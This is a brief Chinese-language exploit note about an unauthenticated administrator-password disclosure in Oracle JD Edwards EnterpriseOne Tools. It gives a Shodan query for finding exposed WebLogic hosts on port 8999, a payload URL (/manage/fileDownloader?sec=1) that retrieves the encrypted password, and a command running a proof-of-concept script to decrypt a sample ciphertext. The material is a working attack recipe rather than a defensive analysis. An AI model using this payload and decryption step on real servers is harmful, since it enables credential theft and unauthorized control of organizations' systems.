O9-1Oracle-JDEdwards-PermissionAC

漏洞描述：

Oracle JDEdwards EnterpriseOne Tools未授权获取管理员密码泄漏

fofa语法：

shodan：port:8999 product:“Oracle WebLogic Server”

漏洞复现：

获取密文 使用脚本进行解密。
payload：

http://ip:8999/manage/fileDownloader?sec=1

python3 poc.py –string ACHCJKFKHCJKKKJJIBBOCDPIHOEJIICHDGHGJEBABEAG